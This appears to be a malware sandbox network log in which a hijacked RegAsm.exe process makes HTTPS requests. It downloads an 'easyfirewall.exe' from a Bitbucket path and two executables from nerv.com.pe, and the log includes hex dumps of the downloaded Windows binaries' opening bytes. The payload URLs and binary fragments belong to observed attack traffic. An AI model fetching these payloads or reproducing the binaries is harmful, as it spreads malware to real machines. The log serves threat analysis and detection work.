2024-09-21 12:48:03 UTC	93	IN	Data Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49725	185.166.143.48	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:10 UTC	232	OUT	GET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: bitbucket.org Cache-Control: no-cache
2024-09-21 12:48:10 UTC	4997	IN	HTTP/1.1 302 Found Date: Sat, 21 Sep 2024 12:48:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6 [TRUNCATED] Expires: Sat, 21 Sep 2024 12:48:10 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 3a7b0a78ac00 X-Version: 80907f89f58b X-Static-Version: 80907f89f58b X-Request-Count: 3787 X-Render-Time: 0.03911185264587402 X-B3-Traceid: 8bf1de2f1d4b43f9b25e6cf2b11a5252 X-B3-Spanid: b7a6021bc027893e X-Frame-Options: SAMEORIGIN Content-Security-Policy: object-src 'none'; base-uri 'self'; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net f [TRUNCATED] X-Usage-Quota-Remaining: 999268.843 X-Usage-Request-Cost: 742.93 X-Usage-User-Time: 0.017560 X-Usage-System-Time: 0.004728 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 8bf1de2f1d4b43f9b25e6cf2b11a5252 Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49729	162.241.61.218	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:10 UTC	200	OUT	GET /vsfdhgg15.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: nerv.com.pe Cache-Control: no-cache
2024-09-21 12:48:10 UTC	249	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 20 Sep 2024 21:15:01 GMT Accept-Ranges: bytes Content-Length: 423328 Content-Type: application/x-msdownload
2024-09-21 12:48:10 UTC	7943	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3e e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1c 06 00 00 08 00 00 00 00 00 00 ee 3a 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>f: @@ `
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 40 2e 88 34 1d eb 0f 56 25 84 77 25 8c 9b 8f 34 f5 00 29 82 90 8c 06 05 b3 89 cf 78 55 8c 0c c1 4c a6 6f 87 b1 44 c3 bd c1 02 81 85 9b d6 54 3d 46 f9 6f 7d d1 d1 16 c8 60 f6 59 f4 3a 40 da 1c ec 0e dc eb 42 4f b7 5a fd 65 c8 d8 60 6d 63 ab 71 8a bc 7a 7a b4 56 ce a8 1f a4 78 a7 30 b0 66 3f 15 71 eb aa 77 d8 10 f6 42 ef d7 f0 d9 60 87 5a 38 86 e0 29 00 0a bb 95 65 99 53 74 04 77 81 39 12 30 c1 99 17 50 34 41 5b 8c e0 ea 06 2a 8f fe 7f 0d cf 0b 13 ba 5e 3e 9a 5c 2c 90 27 40 70 d6 a3 fe 5a 2c ac 81 22 e8 66 53 ec ed 62 d5 ba b1 44 76 18 45 0b 27 6a d6 17 77 ac e9 17 61 b8 1a fd 37 ac 08 75 35 ec c7 d3 6c 2d d0 b9 e8 0a 83 7c a6 16 2e 68 91 a1 0a 2e 4f 4c 2c fa bc b7 8f 0c 62 bb 7b 22 26 e2 37 53 e9 ab 2d 83 97 17 4c d0 16 04 10 00 b6 57 39 0e b0 87 32 16 90 Data Ascii: @.4V%w%4)xULoDT=Fo}`Y:@BOZe`mcqzzVx0f?qwB`Z8)eStw90P4A[*^>\,'@pZ,"fSbDvE'jwa7u5l-\|.h.OL,b{"&7S-LW92
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 9b 8c 02 2a 10 54 80 aa bc 93 84 b2 db d2 5a cf 61 0c d6 03 5a fb 26 fa 61 56 fd 81 e8 17 f9 d5 73 64 5d 71 76 3e 99 7b 19 bc e7 9a c3 dc 8a 55 6f f9 7d 75 e0 0f 47 86 19 ff da b2 bd 78 43 14 a9 dc b9 a4 b6 5a b4 34 76 18 97 ba 47 dd 83 a9 07 f7 4b a0 78 bc f7 e8 38 99 63 a0 2e e5 26 c1 e1 3d 71 15 64 26 a9 2f e4 fe 76 b3 5b 93 55 88 23 bb f3 ff 89 3d a4 3f 6d a7 d8 20 07 34 65 ee cd 1d f0 7a dc 2d de cb 43 d4 5c 33 9f 4f 78 b5 0f 3c c7 03 c0 e1 ad b0 38 0c 54 fc 15 e8 88 a2 c2 92 97 8b 64 f8 0b f5 50 c4 76 43 77 07 51 52 d6 20 7e 22 18 8d 8e ee 2b d6 c6 4f 9f d4 2b 28 c5 71 ff ad ce c9 c9 d0 fb 12 be 2b 5e 64 5e 32 1f 92 cc 8c 9d 82 86 35 36 60 b4 64 c3 52 5b 25 9c df da 1a 88 b6 c6 64 e9 f4 55 c5 90 91 1f ad 38 ed e1 68 52 32 5d d8 6d 8f 8c b7 09 a7 01 Data Ascii: *TZaZ&aVsd]qv>{Uo}uGxCZ4vGKx8c.&=qd&/v[U#=?m 4ez-C\3Ox<8TdPvCwQR ~"+O+(q+^d^256`dR[%dU8hR2]m
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: e5 66 7c 0f 55 38 09 e0 9b c8 33 26 9e 54 37 ae 54 6a 8b 9a 71 05 57 9a 89 c5 68 27 2a 87 ee 29 3c 24 56 c0 0c b6 df 2e bd 06 b0 38 22 34 36 65 47 4c 18 e3 d4 b2 2b 37 b7 76 8b d4 dc 10 3e 98 18 de 0c 01 c7 7e a6 81 06 74 4d e3 80 c9 14 e2 03 12 93 21 25 f2 12 1f 4f dd 65 e0 91 e1 5d 67 99 37 5c ae 52 e6 cb 33 df 97 c7 a5 5f d5 0f 82 c0 b8 86 ad 6c f8 3a 98 ed e0 cf 2c b5 ed b7 8a a7 7e dd 9c ad 09 71 f7 52 4b 27 47 0a c6 99 ff 98 82 59 be e9 e5 9a c1 6c 1e a8 82 64 f0 57 4e cc e2 f7 f4 5a 40 fc 4e 3d 14 35 4b da 2a c3 3c 9b 2e 79 d8 67 ce 25 89 f3 16 c5 e1 75 27 6e c1 b1 0b 13 ba 5d a2 6b 63 9e 01 5c 31 9a b7 71 c2 5c bd 29 e9 6e f2 95 bd f7 5a c6 c5 47 d1 d2 59 70 14 61 f2 2a da c9 68 9c 1d ca 43 c8 12 ca e1 0d 3d 1c 6b c7 10 d2 7b 61 d0 a6 ad 1f 83 ab Data Ascii: f\|U83&T7TjqWh')<$V.8"46eGL+7v>~tM!%Oe]g7\R3_l:,~qRK'GYldWNZ@N=5K<.yg%u'n]kc\1q\)nZGYpa*hC=k{a
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: c0 f5 1a b4 72 8b ca 4c 82 8f c7 eb be 92 b6 0c fd d2 7a ad 70 69 c7 78 57 fd 91 91 74 ef 4b 09 1f ef e9 3a f5 bc df bb f6 9c b8 29 70 15 30 75 83 6e 8c 23 77 5c ab 96 54 8a 45 52 a9 04 ea f5 fd 26 f1 b8 b5 79 47 f3 25 84 41 3f bb d0 01 8d d3 10 ce 01 19 32 05 9e bb 6b 9b 75 e9 0c c7 b9 48 c4 06 34 da 00 f1 25 34 1e 72 fd 9a b5 52 74 87 eb c0 34 f1 90 5f 84 00 8e d8 9a 91 93 d9 55 45 45 37 15 d5 34 79 1f af 88 cd 5f 2a 4f 60 c1 9e 0c 85 74 e1 e0 ff d2 3f 3c b8 2d b9 95 e3 9b f5 3b 5b 2f 7d 9f 4f ca 82 c7 df bf c6 5c 10 01 e0 6a cf aa 7f 08 1f cd 8a 83 1f e3 7e b0 f5 a7 5e 61 12 ab fc 36 34 ba 3d cb 4a bc c4 52 1f b9 c3 e0 e2 5e b8 4d a6 dc fa 1c 93 0d 65 47 7e 3b e1 1c 5d fb 1e fb 52 ea 2b 41 ef 7b 90 15 bd 6a 0c d2 e0 6c a5 7d 0e 93 3d 6f 94 bd 9e 47 93 Data Ascii: rLzpixWtK:)p0un#w\TER&yG%A?2kuH4%4rRt4_UEE74y_*O`t?<-;[/}O\j~^a64=JR^MeG~;]R+A{jl}=oG
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 78 07 c1 4f 58 a2 ee 75 cd 06 2a 0d cf 94 6e 4f 4d e6 fb fd bf 6e 2c 44 b4 c5 77 fc 32 81 fb 3f d8 0d b2 31 c8 b5 cd 0b 60 41 66 60 19 99 5d da d3 54 a7 4f bd ec bc 39 46 63 0e b9 bb 9f 5d d2 c0 76 44 47 8b dd d4 44 13 53 cc 92 0f 21 d1 88 b5 65 5a a5 eb 35 31 27 a9 b3 aa a5 ec c1 c9 8e ad 4f a5 d6 80 28 a7 d5 d1 16 92 56 da ad 21 87 8e 72 12 d4 5a 0b c5 3e 29 3a e9 6e ce 8e 04 d6 d8 43 8a de 2d 6e 93 cb 25 66 01 26 de 4c 2e 8d 8a 3b 94 82 2b 53 1a 53 99 27 f1 4b d1 4f 22 1d 9d de ea e0 12 c9 21 36 08 c7 4c 11 13 7f 09 57 47 36 fd c0 f7 df 5a 77 55 fd 2b 96 c3 df 33 49 bd 3f bb 95 1a bb ea 0e 07 d0 02 90 d7 9e 06 34 7b f7 0a 96 30 cf 2e 03 6e d0 d5 bc 1c 18 4b f9 4e d8 6c a0 1f e9 6b a6 34 4d d1 c1 8a 43 df 2a 9d de 9a e6 fa bb 9d 78 ef 54 e1 6c 07 1b eb Data Ascii: xOXunOMn,Dw2?1`Af`]TO9Fc]vDGDS!eZ51'O(V!rZ>):nC-n%f&L.;+SS'KO"!6LWG6ZwU+3I?4{0.nKNlk4MCxTl
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 6e fb 58 47 20 b9 48 e7 23 e9 aa 01 25 a4 29 33 20 64 64 50 86 90 53 9d b4 86 2f 11 60 cd 2e a5 a3 46 ba 8d 52 a9 ae 88 a9 75 47 5e a1 18 3f 36 0a 89 88 4b 02 53 7c 1c 4c 49 42 07 c9 d1 31 5d 70 07 69 4f 45 af cb 38 5b 51 41 f4 ef c6 2a 3b 71 a3 fb 0b 9c 8f 3b c9 cc c5 c3 31 19 0b 8c 37 76 47 df 34 37 b4 33 b8 1b 94 64 33 51 be d9 09 89 c8 99 b8 69 e9 3d 80 cf 66 e0 1c 2a 81 e6 6a d9 83 f6 82 ef 74 21 9e fd bb 36 23 29 b0 1f dd 2b 93 6f b2 07 df 03 7d d9 2e c1 c9 c2 06 be e4 1e d2 34 da 6f 4b 51 ce 8d 1d 50 60 4c 8c 74 a7 ec 0b 28 e3 df db 15 55 01 fe 4b c8 d2 6e 48 78 a6 7c bf 70 3f 76 e4 27 f5 83 ff 92 a0 91 f9 dc 5d ef 9e 44 da 00 73 10 23 a4 b6 80 9b 9d fc 3f 2b 4f ea 5d 8b 8e be 47 92 89 51 a1 97 5c d6 27 85 35 bd 35 1b 02 8d 4b 13 3c fb f8 ae 6f 72 Data Ascii: nXG H#%)3 ddPS/`.FRuG^?6KS\|LIB1]piOE8[QA;q;17vG473d3Qi=fjt!6#)+o}.4oKQP`Lt(UKnHx\|p?v']Ds#?+O]GQ\'55K<or
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: b1 d1 37 88 52 5f d8 26 1f ef 27 fe af c8 7f c2 28 77 9c ac 05 a3 64 a4 c9 38 a4 47 63 ef 96 e8 e2 cb 8b de c4 05 75 eb 63 3a 1b 1c ac a8 ff b1 d4 cb e6 21 f6 b0 02 93 68 86 55 17 ee 09 dd 0d 27 b7 ea 6d a3 4b c8 23 77 50 e8 cb e0 17 75 5e d6 ab 48 01 91 fa 21 0f 4e 03 d2 c2 fc 29 63 e1 70 d1 06 84 95 47 93 d3 7b 2e 83 36 04 c5 4d f7 9b 05 0c a4 cb a3 46 b8 bc f9 0d 45 a6 7a 0c 8b 27 b0 c5 ea 7b 34 d5 3f 9f 18 5f 54 d6 45 a3 ba a6 f4 20 e3 1d 73 ef 1a 00 2b 4a fc 3c 1a 6c 7f e8 5e 11 62 23 4a 98 74 91 48 34 0e 96 bf 91 a4 9d 2c b5 c1 16 9a be e6 52 12 5c 67 cd bf a1 f5 5b 45 f2 23 15 87 bf e9 aa ec b2 12 d1 e1 fb ab d5 16 30 1c d8 73 62 ad fa e8 3c f6 dc 2b d0 b2 a0 2a ae 54 fb 55 c6 91 21 53 60 b6 c1 72 41 ae c7 a9 16 0d 9e ba 29 09 86 24 cc fc 92 92 7d Data Ascii: 7R_&'(wd8Gcuc:!hU'mK#wPu^H!N)cpG{.6MFEz'{4?_TE s+J<l^b#JtH4,R\g[E#0sb<+*TU!S`rA)$}
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 1c 33 92 e3 ac 14 e2 8b 5e 00 ce e9 ab 93 dd 71 36 91 3d 3c 2c 8e cd 05 1d f2 70 3f 85 60 3a ff f4 3e e7 ed b1 1e 4a f6 2c 08 dc 9f 08 33 cf 45 06 9b a3 fd a4 c7 dc 8c b6 06 ed 17 ee e7 a4 e1 f7 8c dc e7 1a 13 46 d9 68 48 03 fe 4f 22 18 e7 c7 b7 9d 4d af cf 9e 8e 31 8d 8c ba 9d a1 f3 47 5b 08 58 68 3b ac 08 65 97 6f a1 b1 b6 07 ea f1 63 d2 e7 f7 90 10 0a ad e8 6d e5 37 44 28 19 73 4f 72 73 44 71 8c 02 f3 41 9f 62 c5 b4 82 14 ac e0 2c 10 82 79 fd 8f a5 dd 32 b5 f7 15 57 f6 cf 8a 8b d1 9f 7e 38 6a 25 f0 73 18 42 7c c4 f7 24 76 b6 3f 8b f1 e9 ca 09 40 a8 0f ef b3 aa 5c 59 c8 85 2e 40 84 67 45 02 94 2b 71 9b 6e d5 63 03 81 0b 8e 28 8e 8d be 29 4a 11 28 ea d5 70 ef af fe 77 f1 1a cc 07 37 85 57 97 42 c3 9b ee c0 2b 55 27 55 f5 ed 98 f7 72 85 8b 41 95 c7 6b 6f Data Ascii: 3^q6=<,p?`:>J,3EFhHO"M1G[Xh;eocm7D(sOrsDqAb,y2W~8j%sB\|$v?@\Y.@gE+qnc()J(pw7WB+U'UrAko
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: cc b8 e3 b4 14 43 7a 68 87 86 22 69 88 d7 e2 28 f2 ce 34 f5 ca 2b 9b c8 71 7e 39 93 78 2d e7 06 78 2f f3 63 3c c4 15 85 b6 35 ea 3e 84 36 fe db b4 d7 07 cf 69 46 83 d0 30 8f 24 3f 59 29 f7 19 d5 de 82 de 44 49 c1 5c f7 2a 74 92 0b f3 58 ff cd 0b c0 69 02 3b 18 30 63 68 3c 97 ef 68 af 32 e6 14 e3 c4 55 e6 54 57 cf 16 5e 71 35 92 4d 2b c2 3b 09 5d c9 7f 3a b2 31 ed 0c 55 4a dd 71 b1 2f 11 85 6d 12 d1 30 61 04 e1 f5 16 72 5f 97 1e d1 31 3b 30 bc 90 32 8a 45 b6 39 51 22 01 cf 6e 27 af 4d 2a 00 49 29 d1 77 ce a3 70 a6 43 86 f4 2d af 46 9e 32 8e 9b 24 ee 7c 9f e3 ea 6f 44 5a cd bc 96 32 41 96 16 0b 88 18 f8 39 e4 62 17 8c 28 b1 a2 17 8c 0d 46 2e ac 19 43 d5 d6 0d ae cf f6 a5 95 de 37 53 80 c5 f6 6a 34 fe d1 c6 bd 04 46 08 63 00 cb fd b3 02 cb 50 b8 f0 cf 5c 7e Data Ascii: Czh"i(4+q~9x-x/c<5>6iF0$?Y)DI\tXi;0ch<h2UTW^q5M+;]:1UJq/m0ar_1;02E9Q"n'MI)wpC-F2$\|oDZ2A9b(F.C7Sj4FcP\~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49726	162.241.61.218	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:10 UTC	198	OUT	GET /vfsdgdf.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: nerv.com.pe Cache-Control: no-cache
2024-09-21 12:48:10 UTC	249	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 20 Sep 2024 21:15:00 GMT Accept-Ranges: bytes Content-Length: 423328 Content-Type: application/x-msdownload
2024-09-21 12:48:10 UTC	7943	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1c 06 00 00 08 00 00 00 00 00 00 ee 3a 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2f: @@ `
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: c4 0f b7 74 ab d0 4a 21 fc ad e7 fc 29 13 28 11 95 ee ca cf 23 98 c5 84 24 0c 88 81 33 93 c1 c4 5e f4 8f c3 fa c7 14 3c a5 09 ae db 0a 48 95 7a e8 70 12 f7 28 a7 bd 5a 15 dd 65 94 7f 03 27 f9 39 63 7c cc ef 29 39 e2 e7 50 8d 32 4c 60 ac 4c 0f 70 84 c4 45 bc 21 bf bb ec f3 d9 65 be df 80 59 2c f4 72 5f b4 e6 d5 9f 1f d3 7f 7e 07 ae 7e a6 ae 36 51 c4 fc 80 07 53 fb 23 9d ae 3a 87 4a d9 0b 02 49 e4 8a 01 b7 f5 48 94 9e 4b 71 74 49 ac c3 c3 38 0e a6 75 98 2e f4 52 3d b3 e8 eb 80 30 1e e0 1c 1b df 0d 6f 92 e9 8c 0e cd 53 7b cf 39 eb 9c b7 b3 c1 e7 53 73 d1 42 e9 1d f1 6b 1c 22 04 6f 10 a4 a6 8d 4e ff 02 18 0e ac cf ef 29 c2 20 63 d3 4a 15 3f cd 51 71 39 6b 3f 8a 5e 53 dd 40 b1 44 6a 5e 82 70 c2 af e4 af 90 e6 78 34 ba a7 6b 42 38 64 d0 41 e3 2d 2a 1f 6f 12 41 Data Ascii: tJ!)(#$3^<Hzp(Ze'9c\|)9P2L`LpE!eY,r_~~6QS#:JIHKqtI8u.R=0oS{9SsBk"oN) cJ?Qq9k?^S@Dj^px4kB8dA-*oA
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 46 a4 73 b6 d2 37 64 bb 6e f0 75 f3 9f e1 42 b3 83 d9 29 7d d0 44 bf 95 1c 24 7b c4 96 8c 38 52 f0 d7 62 61 8e 5b 80 c7 2c 92 0e 64 f9 b4 c2 f4 6d ab 9e ad a0 a2 27 d3 bb 9b 40 8a ba 79 82 94 50 0c 6e ab 07 f0 69 f4 f7 ab 60 ed 16 7e d3 4d f8 f1 34 32 c1 07 9d 09 dc e9 e1 05 d1 fa cb bc f6 17 8f 4a 53 f7 93 ab d7 6c 95 13 76 d5 b9 a0 2e 7f c3 40 b0 2d b9 1d f4 f2 3a d0 ce ce 3e b3 20 4f 84 76 bd cd c1 76 ce 0a 37 32 bc 2a c7 3a dd e1 96 12 ac a0 36 3e 0f 2b e3 e9 20 a9 e3 6c f6 e1 e6 9a 3e d4 f6 c9 59 1c 1d c4 aa d4 79 6e fb de 55 8e 49 53 6f 4a bc ec 13 48 3f 67 44 dd c0 23 26 61 b2 61 90 8c 12 5d 1e 2e df 3a a7 22 76 65 0d 75 03 df 60 4a 4c 60 1b f2 88 66 82 9e 7d fe 5c 4d 54 57 2f ba 82 c5 a8 f1 65 b5 ee a9 55 e4 9d 83 c1 22 0b 26 3c 56 93 14 cd 8f 9e Data Ascii: Fs7dnuB)}D${8Rba[,dm'@yPni`~M42JSlv.@-:> Ovv72*:6>+ l>YynUISoJH?gD#&aa].:"veu`JL`f}\MTW/eU"&<V
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: ed 0c d9 ee 13 d4 76 b0 bd 1b 6b 0f 65 6e ee 8b 1d f0 20 b4 7d fe b8 22 b6 7e a1 2e 24 18 8b 77 c8 cb 0c 6b f9 2d 54 15 fb ce d4 b3 b8 0d 70 0a 1e 88 2e 47 9d 18 9a 29 9d 62 9b a1 73 c7 6e 96 c0 83 25 eb e8 69 09 1e a6 cf ad 60 c6 93 49 99 69 5c 6b 61 66 70 4d 18 b8 39 43 c6 b1 97 59 81 4b 83 80 5c c7 7d f3 90 e7 ba 5b 84 f5 f9 b4 b3 1b 3a bd 00 75 c1 08 43 ea 76 6d db c4 cb 10 62 77 be 95 3b e9 f6 32 ff fe e9 ae 0c 53 e0 41 32 50 ff 27 0e a3 9a be 6e 5c db 5f a8 a5 cf 48 4c d3 63 0d 89 0b 51 9e 18 61 91 5b 67 72 3c 05 f2 11 c8 b7 30 4c ff dc 09 63 26 60 33 db 4a 2d c0 73 25 6e 0b ad 5a 9e a7 7f d0 6a 4e 75 a3 21 b2 00 0a 4c 56 c9 af 0c 45 5d c7 af 0e 6c 63 ec a5 79 b3 b9 4a d2 c7 93 c7 07 1d f4 ff 02 47 0b 55 da d3 a0 a9 fc e0 cd 15 f6 bf c4 23 8c d0 02 Data Ascii: vken }"~.$wk-Tp.G)bsn%i`Ii\kafpM9CYK\}[:uCvmbw;2SA2P'n\_HLcQa[gr<0Lc&`3J-s%nZjNu!LVE]lcyJGU#
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 1b 16 ef e4 fb 69 9b 90 d5 20 e4 8e 4d d2 65 02 87 48 e3 a3 d2 a1 bb 28 22 e1 d8 fb ec 67 23 ad 26 a3 e1 f3 c2 83 ab 88 49 fb be eb 76 98 5a ca 5b c9 12 af d3 10 cb a8 d0 4f fa a1 db 9d e8 15 79 95 7d 95 87 50 36 f1 55 b9 11 00 5f b9 a1 db 3d 51 6c 10 6c 1b 8c f2 02 5f 7b 33 78 09 3e fc d9 75 08 01 62 ee c0 8b 33 bc 0c e2 33 60 2b 4a c4 74 78 36 77 a3 72 53 cd 92 a5 a6 3d da 03 a4 22 be 20 df fd f9 ad 18 6e 15 ae 97 49 f5 d4 a1 65 c4 d8 70 b5 92 ff d6 ef 4f 30 8b 93 a3 5e 09 3d e7 55 54 06 a1 50 71 27 a6 36 e0 79 47 df a0 5f 20 1d f4 ac d1 1e 7a f7 c4 1b 81 09 7c dd 26 d6 81 26 a5 d5 4c 1e cd 71 ef 4a 33 a7 6d 3d fe 0f 6a 83 09 39 4f 3b 4b b8 fc 48 92 6e 3a 34 b2 63 3c b5 5c a8 b1 8f 44 87 09 0f cb d0 ec 20 d6 56 04 58 08 7b 75 cc fd fc bd 1a b1 78 60 20 Data Ascii: i MeH("g#&IvZ[Oy}P6U_=Qll_{3x>ub33`+Jtx6wrS=" nIepO0^=UTPq'6yG_ z\|&&LqJ3m=j9O;KHn:4c<\D VX{ux`
